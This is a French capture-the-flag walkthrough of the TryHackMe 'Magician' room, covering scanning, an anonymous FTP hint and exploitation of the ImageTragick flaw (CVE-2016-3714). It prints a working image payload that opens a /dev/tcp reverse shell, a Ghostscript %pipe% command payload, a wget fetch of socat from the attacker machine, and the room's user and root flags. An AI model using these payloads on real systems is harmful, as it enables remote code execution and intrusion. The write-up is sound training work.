https://tryhackme.com/room/magician
root@ip-10-10-73-181:~# nmap -sC -sV 10.10.212.13
Starting Nmap 7.60 ( https://nmap.org ) at 2022-12-17 22:26 GMT
Nmap scan report for ip-10-10-212-13.eu-west-1.compute.internal (10.10.212.13)
Host is up (0.00098s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
8080/tcp open http-proxy
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 404
| Vary: Origin
| Vary: Access-Control-Request-Method
| Vary: Access-Control-Request-Headers
| Content-Type: application/json
| Date: Sat, 17 Dec 2022 22:27:00 GMT
| Connection: close
| {"timestamp":"2022-12-17T22:27:00.655+0000","status":404,"error":"Not Found","message":"No message available","path":"/nice%20ports%2C/Tri%6Eity.txt%2ebak"}
| GetRequest:
| HTTP/1.1 404
| Vary: Origin
| Vary: Access-Control-Request-Method
| Vary: Access-Control-Request-Headers
| Content-Type: application/json
| Date: Sat, 17 Dec 2022 22:27:00 GMT
| Connection: close
| {"timestamp":"2022-12-17T22:27:00.488+0000","status":404,"error":"Not Found","message":"No message available","path":"/"}
| HTTPOptions:
| HTTP/1.1 404
| Vary: Origin
| Vary: Access-Control-Request-Method
| Vary: Access-Control-Request-Headers
| Content-Type: application/json
| Date: Sat, 17 Dec 2022 22:27:00 GMT
| Connection: close
| {"timestamp":"2022-12-17T22:27:00.604+0000","status":404,"error":"Not Found","message":"No message available","path":"/"}
| RTSPRequest:
| HTTP/1.1 505
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 465
| Date: Sat, 17 Dec 2022 22:27:00 GMT
| <!doctype html><html lang="en"><head><title>HTTP Status 505
| HTTP Version Not Supported</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 505
|_ HTTP Version Not Supported</h1></body></html>
|_http-title: Site doesn't have a title (application/json).
8081/tcp open http nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: magician
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.60%I=7%D=12/17%Time=639E4234%P=x86_64-pc-linux-gnu%r(G
SF:etRequest,13B,"HTTP/1\.1\x20404\x20\r\nVary:\x20Origin\r\nVary:\x20Acce
SF:ss-Control-Request-Method\r\nVary:\x20Access-Control-Request-Headers\r\
SF:nContent-Type:\x20application/json\r\nDate:\x20Sat,\x2017\x20Dec\x20202
SF:2\x2022:27:00\x20GMT\r\nConnection:\x20close\r\n\r\n{\"timestamp\":\"20
SF:22-12-17T22:27:00\.488\+0000\",\"status\":404,\"error\":\"Not\x20Found\
SF:",\"message\":\"No\x20message\x20available\",\"path\":\"/\"}")%r(HTTPOp
SF:tions,13B,"HTTP/1\.1\x20404\x20\r\nVary:\x20Origin\r\nVary:\x20Access-C
SF:ontrol-Request-Method\r\nVary:\x20Access-Control-Request-Headers\r\nCon
SF:tent-Type:\x20application/json\r\nDate:\x20Sat,\x2017\x20Dec\x202022\x2
SF:022:27:00\x20GMT\r\nConnection:\x20close\r\n\r\n{\"timestamp\":\"2022-1
SF:2-17T22:27:00\.604\+0000\",\"status\":404,\"error\":\"Not\x20Found\",\"
SF:message\":\"No\x20message\x20available\",\"path\":\"/\"}")%r(RTSPReques
SF:t,259,"HTTP/1\.1\x20505\x20\r\nContent-Type:\x20text/html;charset=utf-8
SF:\r\nContent-Language:\x20en\r\nContent-Length:\x20465\r\nDate:\x20Sat,\
SF:x2017\x20Dec\x202022\x2022:27:00\x20GMT\r\n\r\n<!doctype\x20html><html\
SF:x20lang=\"en\"><head><title>HTTP\x20Status\x20505\x20\xe2\x80\x93\x20HT
SF:TP\x20Version\x20Not\x20Supported</title><style\x20type=\"text/css\">bo
SF:dy\x20{font-family:Tahoma,Arial,sans-serif;}\x20h1,\x20h2,\x20h3,\x20b\
SF:x20{color:white;background-color:#525D76;}\x20h1\x20{font-size:22px;}\x
SF:20h2\x20{font-size:16px;}\x20h3\x20{font-size:14px;}\x20p\x20{font-size
SF::12px;}\x20a\x20{color:black;}\x20\.line\x20{height:1px;background-colo
SF:r:#525D76;border:none;}</style></head><body><h1>HTTP\x20Status\x20505\x
SF:20\xe2\x80\x93\x20HTTP\x20Version\x20Not\x20Supported</h1></body></html
SF:>")%r(FourOhFourRequest,15E,"HTTP/1\.1\x20404\x20\r\nVary:\x20Origin\r\
SF:nVary:\x20Access-Control-Request-Method\r\nVary:\x20Access-Control-Requ
SF:est-Headers\r\nContent-Type:\x20application/json\r\nDate:\x20Sat,\x2017
SF:\x20Dec\x202022\x2022:27:00\x20GMT\r\nConnection:\x20close\r\n\r\n{\"ti
SF:mestamp\":\"2022-12-17T22:27:00\.655\+0000\",\"status\":404,\"error\":\
SF:"Not\x20Found\",\"message\":\"No\x20message\x20available\",\"path\":\"/
SF:nice%20ports%2C/Tri%6Eity\.txt%2ebak\"}");
MAC Address: 02:D1:B8:E6:23:01 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.93 seconds
Nous avons 3 ports ouverts: 21, 8080 et 8081.
Essayons de nous connecter en FTP dans un premier temps.
root@ip-10-10-73-181:~# ftp 10.10.212.13
Connected to 10.10.212.13.
220 THE MAGIC DOOR
Name (10.10.212.13:root): anonymous
331 Please specify the password.
Password:
230-Huh? The door just opens after some time? You're quite the patient one, aren't ya, it's a thing called 'delay_successful_login' in /etc/vsftpd.conf ;) Since you're a rookie, this might help you to get started: https://imagetragick.com. You might need to do some little tweaks though...
230 Login successful.
ftp> ls
550 Permission denied.
ftp: bind: Address already in use
ftp> cd /
550 Permission denied.
ftp>
On obtient un indice. Par contre, on ne peut pas aller plus loin avec ce service.
L’indice nous renvoie à la CVE CVE-2016–3714
Nous allons donc exploiter cette vulnérabilité. Pour cela, nous nous aiderons de ce repository Github.
Image Tragik 1 & 2
Exploit v1
Simple reverse shell
push graphic-context
encoding "UTF-8"
viewbox 0 0 1 1
affine 1 0 0 1 0 0
push graphic-context
image Over 0,0 1,1 '|/bin/sh -i > /dev/tcp/ip/80 0<&1 2>&1'
pop graphic-context
pop graphic-context
Exploit v2
Simple id payload
%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%id) currentdevice putdeviceprops
then use convert shellexec.jpeg whatever.gifNous créons un fichier image.png et ajoutons le code de l’exploit 1 en y ajoutant notre adresse IP et le port 4444.
Puis nous uploadons cette image via le formulaire du site, et nous lançons un listener sur notre machine.
root@ip-10-10-73-181:~# rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.73.181] from (UNKNOWN) [10.10.212.13] 60864
bash: cannot set terminal process group (957): Inappropriate ioctl for device
bash: no job control in this shell
magician@magician:/tmp/hsperfdata_magician$ id
id
uid=1000(magician) gid=1000(magician) groups=1000(magician)La vulnérabilité est exploitée.
Il ne nous reste plus qu’à lire le flag user.
magician@magician:/tmp/hsperfdata_magician$ cd /home/magician
magician@magician:~$ ls -la
ls -la
total 17204
drwxr-xr-x 5 magician magician 4096 Feb 13 07:19 .
drwxr-xr-x 3 root root 4096 Jan 30 10:43 ..
lrwxrwxrwx 1 magician magician 9 Feb 6 13:38 .bash_history -> /dev/null
-rw-r--r-- 1 magician magician 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 magician magician 3771 Apr 4 2018 .bashrc
drwx------ 2 magician magician 4096 Jan 30 10:43 .cache
drwx------ 3 magician magician 4096 Jan 30 10:43 .gnupg
-rw-r--r-- 1 magician magician 807 Apr 4 2018 .profile
-rw-r--r-- 1 magician magician 0 Jan 30 10:43 .sudo_as_admin_successful
-rw------- 1 magician magician 7546 Jan 31 03:50 .viminfo
-rw-r--r-- 1 root root 17565546 Jan 30 11:55 spring-boot-magician-backend-0.0.1-SNAPSHOT.jar
-rw-r--r-- 1 magician magician 170 Feb 13 07:19 the_magic_continues
drwxr-xr-x 2 root root 4096 Feb 5 05:14 uploads
-rw-r--r-- 1 magician magician 24 Jan 30 11:30 user.txt
magician@magician:~$ cat user.txt
cat user.txt
THM{simsalabim_hex_hex}Il y a un autre indice dans le répertoire /magician.
magician@magician:~$ cat the_magic_continues
cat the_magic_continues
The magician is known to keep a locally listening cat up his sleeve, it is said to be an oracle who will tell you secrets if you are good enough to understand its meows.Un listener en local ? Utilisons la commande nestat. Cette commande révèlera un listener en local sur le port 6666.
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:6666 0.0.0.0:* LISTEN - Nous allons forwarder ce port local en utilisant socat. On transfère le binaire socat depuis notre machine et on l’utilise pour forwarder du port 6666 vers le port 7777.
magician@magician:~$ wget http://10.10.73.181:8000/socat
magician@magician:~$ chmod +x socat
magician@magician:~$ ./socat tcp-listen:7777,reuseaddr,fork tcp:localhost:6666Si on se connecte via le navigateur sur le port 7777, une page s’affiche. Celle-ci nous permet de lire les fichiers, en particulier le fichier root.txt.
Ce fichier est en base64. Il ne nous reste plus qu’à le déchiffrer.
root@ip-10-10-73-181:~# echo "VEhNe21hZ2ljX21heV9tYWtlX21hbnlfbWVuX21hZH0K" | base64 -d
THM{magic_may_make_many_men_mad}
Résumé
Voir https://imagetragick.com/
Voir PayLoadAllTheThings
Voir https://www.cyberciti.biz/faq/linux-unix-tcp-port-forwarding/